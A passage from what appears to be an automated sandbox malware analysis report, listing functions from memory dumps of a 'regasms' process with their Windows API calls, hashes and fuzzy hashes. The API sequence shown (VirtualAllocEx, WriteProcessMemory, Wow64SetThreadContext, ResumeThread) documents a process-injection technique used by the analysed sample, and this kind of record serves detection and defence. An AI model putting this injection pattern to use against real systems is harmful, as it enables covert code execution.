                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07225AF0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 4cce012d1aaaf86fc6bf7439ced1af1c5991c51394c8ce8606c4baa83a586091
                                  • Instruction ID: c5ca6a6b336e8e20f09efa041c890c424440ebce032abdf016a0321981edab6b
                                  • Opcode Fuzzy Hash: 4cce012d1aaaf86fc6bf7439ced1af1c5991c51394c8ce8606c4baa83a586091
                                  • Instruction Fuzzy Hash: C72127B2910359DFDB10CFAAC881BDEBBF5FF48310F10842AE919A7240D7799951DBA4
                                  Function 072258C0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07225946
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: c9c00942a65e1febd510d025ee34c999274c3531057ed986c19794b500785e03
                                  • Instruction ID: 929397a315c86e15a7c702b44b5389d0773a234c46b71cea4ebe05f09ca7fe0f
                                  • Opcode Fuzzy Hash: c9c00942a65e1febd510d025ee34c999274c3531057ed986c19794b500785e03
                                  • Instruction Fuzzy Hash: 61216D71D103099FDB10DFAAC4417EEBBF4EF48220F10C429D558A7680CB789545CFA5
                                  Function 07225B48 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07225BD0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: f81fb6ede928554710533fb7081e48e11164c4a3debbe13938be5b27632a34ac
                                  • Instruction ID: f3572587d43742b7e5acc70f3d37aae1fc16a4d67ce83e9a291f5018dc438b35
                                  • Opcode Fuzzy Hash: f81fb6ede928554710533fb7081e48e11164c4a3debbe13938be5b27632a34ac
                                  • Instruction Fuzzy Hash: 2C2105B2C103599FDB10DFAAC880BEEBBF5FF48310F10842AE518A7240C7799555DBA5
                                  Function 00A1D7C0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 08cf83690e4e7307fe88f653b1b7b1d687f515231f96a737f14c1eb68251f4b1
                                  • Instruction ID: 1128df2d5869494a87988b67d9e31c9ac2e2bc3de18dc69177a6663cc3fb69eb
                                  • Opcode Fuzzy Hash: 08cf83690e4e7307fe88f653b1b7b1d687f515231f96a737f14c1eb68251f4b1
                                  • Instruction Fuzzy Hash: 0021D4B5D00208EFDB10CF99D585ADEBBF4EB48310F14841AE958A7250D379A940CF65
                                  Function 07225B50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07225BD0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 4f0eba3488e5ccd56cc280efbfee781a3d08c784242cfac68366a1ce28d493b2
                                  • Instruction ID: f110d89cbde3bf2c218be69685ced8ba9cc541b1b1e5d828e8da7b30afeb4d46
                                  • Opcode Fuzzy Hash: 4f0eba3488e5ccd56cc280efbfee781a3d08c784242cfac68366a1ce28d493b2
                                  • Instruction Fuzzy Hash: 9F21F2B18003599FDB10DFAAC880BEEBBF5FF48210F50842AE918A7240C77999519BA5
                                  Function 072258C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07225946
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: eabf1a1298058fb746afa2a3b783addd30f915ae78188bb5f8d40d427309dcd8
                                  • Instruction ID: 3f4fecef0bef4b7945104baff96a92a5d3e1bf90cc06df9391b07869af200403
                                  • Opcode Fuzzy Hash: eabf1a1298058fb746afa2a3b783addd30f915ae78188bb5f8d40d427309dcd8
                                  • Instruction Fuzzy Hash: 792138B1D103099FDB14DFAAC4847EEBBF4EF48220F24842AD559A7240CB789A45CFA5
                                  Function 00A1D7C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A1D84F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: ab93e7d0fdf67c256c2e5aad569860fe807340dcc6c643b5cf65c2e059558479
                                  • Instruction ID: 4cdb0568d8d864ebf501a38d9a8cb575bcd3612a8edc2f44e10ba7313e750b97
                                  • Opcode Fuzzy Hash: ab93e7d0fdf67c256c2e5aad569860fe807340dcc6c643b5cf65c2e059558479
                                  • Instruction Fuzzy Hash: 7D21B3B5D00248EFDB10CFAAD584ADEBBF4EB48310F14841AE918A7350D379A944CF65
                                  Function 07225998 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07225A0E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 9b2b01e747f466a5db6052169c895c37a85520c79c0d91b8ae70273471977599
                                  • Instruction ID: 87cc86cc5a9943d7eba54e9c7c797c0799c71e8cd636c3e96dfefd986899a272
                                  • Opcode Fuzzy Hash: 9b2b01e747f466a5db6052169c895c37a85520c79c0d91b8ae70273471977599
                                  • Instruction Fuzzy Hash: 62116A76800348DFDB10DFAAC841BEEBFF5EF48310F108419E515A7250C7759554CBA0
                                  Function 07225811 Relevance: 1.6, APIs: 1, Instructions: 56threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: c3b485b98a62f009851a1b47350875435e124866ec577eea1af3d58f3e1e9e15
                                  • Instruction ID: 2c088a74fb946accb2976599f8b958cebb13e68b7363460c53c5234a287c3264
                                  • Opcode Fuzzy Hash: c3b485b98a62f009851a1b47350875435e124866ec577eea1af3d58f3e1e9e15
                                  • Instruction Fuzzy Hash: 96118BB5C003089FDB20DFAAC4457EEFBF4EB88320F20841AD519A7640CB75A541CBA5
                                  Function 072259A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07225A0E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 44d2ab29bc48cfcccb41588b6de143585a2d2a47ede109e9fd4b8c39317a354a
                                  • Instruction ID: c8530f38e3661b244b9a261b9a157b0bc131d5baf667426cfa529ae6fcc6dcf5
                                  • Opcode Fuzzy Hash: 44d2ab29bc48cfcccb41588b6de143585a2d2a47ede109e9fd4b8c39317a354a
                                  • Instruction Fuzzy Hash: 7D1156728003499FDB20DFAAC845BEEBBF5EF48310F208819E515A7250CB759540CBA0
                                  Function 07229D98 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07229DFD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 65824a829e2103ad6d15b707befabdbdef4fba5b4fdfcabece40c3968d8c564c
                                  • Instruction ID: b81e1b3b2c7f71b76efa1a3d600350469eb60cf206552724b89c187ebde3626f
                                  • Opcode Fuzzy Hash: 65824a829e2103ad6d15b707befabdbdef4fba5b4fdfcabece40c3968d8c564c
                                  • Instruction Fuzzy Hash: 4F11F8B6800259EFDB10DF9AD885BDEFBF8EB48310F208459E554A7250C375A584CFA1
                                  Function 07225818 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 475447e0e016b8223e8f59ed34384cdcf0c8a48f45076b9fd0d38cb3242b35ab
                                  • Instruction ID: 4a4895e487896e1b2c86f86a142f908967bbb4215bb10a43b10bd522f84a2534
                                  • Opcode Fuzzy Hash: 475447e0e016b8223e8f59ed34384cdcf0c8a48f45076b9fd0d38cb3242b35ab
                                  • Instruction Fuzzy Hash: 871125B1D003499FDB24DFAAC4447EEFBF4EB88220F24845AD519A7240CA79A941CBA5
                                  Function 00A1B500 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00A1B566
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1400127205.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_a10000_regasms.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: abbf1911150f2926cfc44842dbfb333b984fd2263d6001b3d194116363450584
                                  • Instruction ID: 99210c5d2e59c134c2db1c564f2d5b98e261b3a5299f50fe29de376cfedaf97d
                                  • Opcode Fuzzy Hash: abbf1911150f2926cfc44842dbfb333b984fd2263d6001b3d194116363450584
                                  • Instruction Fuzzy Hash: 1211DFB6C00649CFDB20DF9AC544ADEFBF5EB88320F10841AD469B7610D379A545CFA5
                                  Function 072226FC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 07229DFD
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1433205233.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7220000_regasms.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ffb2b481c8326feae53eb22ccd7671aa751bdd545357282e5653016edf16241b
                                  • Instruction ID: 81b2683565f1b2c17515def33bf9bee0a9ff4cde2252480125efc7ecd084f368
                                  • Opcode Fuzzy Hash: ffb2b481c8326feae53eb22ccd7671aa751bdd545357282e5653016edf16241b
                                  • Instruction Fuzzy Hash: 1711F5B5810359EFDB20DF9AC489BDEBBF8EB48310F108459E558B7240C375A944CFA5
                                  Function 06E12D98 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (q
                                  • API String ID: 0-2414175341
                                  • Opcode ID: 51f7d68efa73b9c612e2168ed1772c26ad7a3ba4918366d8e53ea2765d0e964b
                                  • Instruction ID: 83d896831ff2b46f12c8e42b49a7e5bb641a35ec5776c4227cc1140c1f31f9f8
                                  • Opcode Fuzzy Hash: 51f7d68efa73b9c612e2168ed1772c26ad7a3ba4918366d8e53ea2765d0e964b
                                  • Instruction Fuzzy Hash: A271C230A003059FEB65DB65D844BAEB7F6EFC8300F10842AE5169B390DF74AE85DB90
                                  Function 06E1ED18 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Teq
                                  • API String ID: 0-1098410595
                                  • Opcode ID: 0c98dd5f382438982b4d29665c7953764c6e4a8c6f1589aa266828be68c0c1cb
                                  • Instruction ID: 262883fa1ddb1655ab700f247f0e550a16b4740bad89f05bdd2841724d37fcc1
                                  • Opcode Fuzzy Hash: 0c98dd5f382438982b4d29665c7953764c6e4a8c6f1589aa266828be68c0c1cb
                                  • Instruction Fuzzy Hash: 7C71D374E04318CFEB48CFAAC884AEDBBB6BF89300F149029E919AB355D7715945DF90
                                  Function 06E18D48 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: 8bef5825290c5e614b4e72d7632c2e342de4d59ece632e9f5536c133a9ae5715
                                  • Instruction ID: be439ed238c19afcebe3bbd5bc07b70e3a3ed728aa534d9b6fea26d67175dab1
                                  • Opcode Fuzzy Hash: 8bef5825290c5e614b4e72d7632c2e342de4d59ece632e9f5536c133a9ae5715
                                  • Instruction Fuzzy Hash: 8F41F930A0D344DFF7E586649C113F73B6A9B96209F1864A7E057CF182D2258E42BBD7
                                  Function 06E182C1 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $q
                                  • API String ID: 0-1301096350
                                  • Opcode ID: f8703e9a747f9a525cd589794210c5985524cfc3889e8d7e95ca6c9a0284d326
                                  • Instruction ID: cac764ae5888049fdd8b40b7cf2c3ffca3e78ad91f09c0352d84992d2e6b6c2f
                                  • Opcode Fuzzy Hash: f8703e9a747f9a525cd589794210c5985524cfc3889e8d7e95ca6c9a0284d326
                                  • Instruction Fuzzy Hash: 920181B0909701DFE3D68B54D5197F3BBA1B716744F08A3A6A80ACF141C7348841E7DA
                                  Function 06E16D20 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: e3c1a0ab9dde6dff624d3b961596e775ca76fb1590f8094332b349e0c1c9515d
                                  • Instruction ID: 51a856c72fe48bd346270299cd1d72d001de4d93b786dafdbc04ae0291530879
                                  • Opcode Fuzzy Hash: e3c1a0ab9dde6dff624d3b961596e775ca76fb1590f8094332b349e0c1c9515d
                                  • Instruction Fuzzy Hash: 81D02EB080D348EFC381AE50A9036F83F3C8752204B2424D6E8088B222CA700E00EFD3
                                  Function 06E16D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: G
                                  • API String ID: 0-985283518
                                  • Opcode ID: 9161b37e0a01c69f863d7f702ee8206df8b037afde611c9aa529d4d1dad181ee
                                  • Instruction ID: 3e764d7950f48e8e2cb64a2d77ff84abaec79eadcbb2e60f7543d78c57f3365b
                                  • Opcode Fuzzy Hash: 9161b37e0a01c69f863d7f702ee8206df8b037afde611c9aa529d4d1dad181ee
                                  • Instruction Fuzzy Hash: 71C012B0508208EBDB44EE94D906AACBBAC9700205F201084E80E4A600CF311E10AE82
                                  Function 06E13478 Relevance: .5, Instructions: 453COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d01fbfa130bef3a3a7500806c968d135e81cc82b3fd3bf6afb3d61deda9f6410
                                  • Instruction ID: e0e5a352661c8a7581ef77d08631cd89c28340a5924f2eb2641de908b790ecaa
                                  • Opcode Fuzzy Hash: d01fbfa130bef3a3a7500806c968d135e81cc82b3fd3bf6afb3d61deda9f6410
                                  • Instruction Fuzzy Hash: 54D1EFB0F00305DFDB95AB68C8486AEBFF5EF44304F5454AAE442AB395EB30C865DB85
                                  Function 06E10480 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfb985b55731d0b93fa12beb85762886016fe517205e73c53cd74fa732341333
                                  • Instruction ID: 1258aa4fd4716e6f0c498d15194f1af2e30a9397da4a190427d39f32ad02b2a7
                                  • Opcode Fuzzy Hash: cfb985b55731d0b93fa12beb85762886016fe517205e73c53cd74fa732341333
                                  • Instruction Fuzzy Hash: B2F1B971D1061A8FCF10DFA4C854AEDB7B5FF88310F1086AAD959B7214EB70AA85CF90
                                  Function 06E10471 Relevance: .3, Instructions: 306COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52441009181f8c179feaa9075c9f6d3be40d4c963a49db56de7ea8c945cddff8
                                  • Instruction ID: 537cf174b7aa7000fbcd4657c855390df6f7b1f666325afc686e3f7c1ba03ae2
                                  • Opcode Fuzzy Hash: 52441009181f8c179feaa9075c9f6d3be40d4c963a49db56de7ea8c945cddff8
                                  • Instruction Fuzzy Hash: BAE1D931D1061A8FCF10DFA8C8546EDB7B5FF88310F1086AAD959B7254EB70AA85CF90
                                  Function 06E14AA1 Relevance: .2, Instructions: 229COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e102e2ceea03f38093b38bb336e74a646ce0990a638d262da94cb6ded2fde38
                                  • Instruction ID: bd74296743b0a8cafe3246ff72b08e541b9fa839d9d3cd9ce55ad040c8b3367d
                                  • Opcode Fuzzy Hash: 7e102e2ceea03f38093b38bb336e74a646ce0990a638d262da94cb6ded2fde38
                                  • Instruction Fuzzy Hash: 3BB1C575910619CFDB10EF68C840A98FBB5FF49314F05C699E949BB315EB30AA89CF90
                                  Function 06E10C38 Relevance: .1, Instructions: 147COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 47b151b63210054b9eb0346867c17089da53489ae1fce2f0b05b61e6e01320d3
                                  • Instruction ID: a38300b4cedf2aa74f579dd38272232558fad770fc141b7d77a5eb8d1ec34e75
                                  • Opcode Fuzzy Hash: 47b151b63210054b9eb0346867c17089da53489ae1fce2f0b05b61e6e01320d3
                                  • Instruction Fuzzy Hash: 36510734E106098FCB50EFA8C8848ADF7B5FF89310B149669E456BB354EB30E985CF90
                                  Function 06E11800 Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4758dda9205faf1bd76fa82d5b8077a8ca9b2e45d1c5ef314fef58924b842718
                                  • Instruction ID: c9b42fe4750ace43ed313f72e2c75e021fff96c12ccd0f461b7acef7ec6e0174
                                  • Opcode Fuzzy Hash: 4758dda9205faf1bd76fa82d5b8077a8ca9b2e45d1c5ef314fef58924b842718
                                  • Instruction Fuzzy Hash: 54419C34A11309DFDB68DF68D558AAEBBB6FF88301B148169E516EB780DF34C841CB91
                                  Function 06E10E40 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e136a9c591630c97e90ac73e248e381bb1a65e06ec229b09767650cc7f33822
                                  • Instruction ID: c1435dfb81f1838099844add15f7bee2bcbe0479d9ac505f134e4688bf3fe83f
                                  • Opcode Fuzzy Hash: 4e136a9c591630c97e90ac73e248e381bb1a65e06ec229b09767650cc7f33822
                                  • Instruction Fuzzy Hash: 9A518235E10609CFCB00EFA8D8849EDF7B5FF89314F10855AE516AB325EB31A949CB91
                                  Function 06E10C29 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa19267511e6f45eab76c05cecd930669db01daeebaf576e7026f83fd080a1eb
                                  • Instruction ID: 3892592e9fa9f3a67a6128101e9798a57270b1fda96d4dfd1ec16a55e140c2f0
                                  • Opcode Fuzzy Hash: aa19267511e6f45eab76c05cecd930669db01daeebaf576e7026f83fd080a1eb
                                  • Instruction Fuzzy Hash: C1414C34A107098FCB50EF68C8849ADF7B1FF88310F149669D456AB355EB34E985CF90
                                  Function 06E17A46 Relevance: .1, Instructions: 110COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db6716486aa7ad8f7fff6ff1c596778a5f17326092d07fed66da9aa833d7fa05
                                  • Instruction ID: 934671879015120276773cb7bde1bb1016f829daddc96a002749136aa9c8c4db
                                  • Opcode Fuzzy Hash: db6716486aa7ad8f7fff6ff1c596778a5f17326092d07fed66da9aa833d7fa05
                                  • Instruction Fuzzy Hash: 98411534A1C3858FDB115BB498295AD7FB6EF86A01B1405A7E043CF282CF344D06CBE2
                                  Function 06E11198 Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa3be4e6a17baca23ca1ac7be38eac6cd6444d663c4cf1f05251518837057df6
                                  • Instruction ID: 50c478ec49bfa5cf5fa495acd482a38602cda4014fbdf402376ae23d10733489
                                  • Opcode Fuzzy Hash: aa3be4e6a17baca23ca1ac7be38eac6cd6444d663c4cf1f05251518837057df6
                                  • Instruction Fuzzy Hash: F0317A71E10218DFDB14DFA9D94499DBBF6FF89200F10826AE912AB360DB309C45DB91
                                  Function 06E16B44 Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.1422495155.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_6e10000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2044c3a41c670f76156198d6b63b12137de5e2422f2cc1dbd0a777e11811c13d
                                  • Instruction ID: e9e28ca7f511507ba26cfb85f9b79d579946becff0d6a9e10b1d3b4967d75bde
                                  • Opcode Fuzzy Hash: 2044c3a41c670f76156198d6b63b12137de5e2422f2cc1dbd0a777e11811c13d
                                  • Instruction Fuzzy Hash: 8E31B470A04308CFEB44DB98D451BEA77F2EB85314F58D45AD4169F381CB359D429B91
                                  Function 06E1C1A1 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
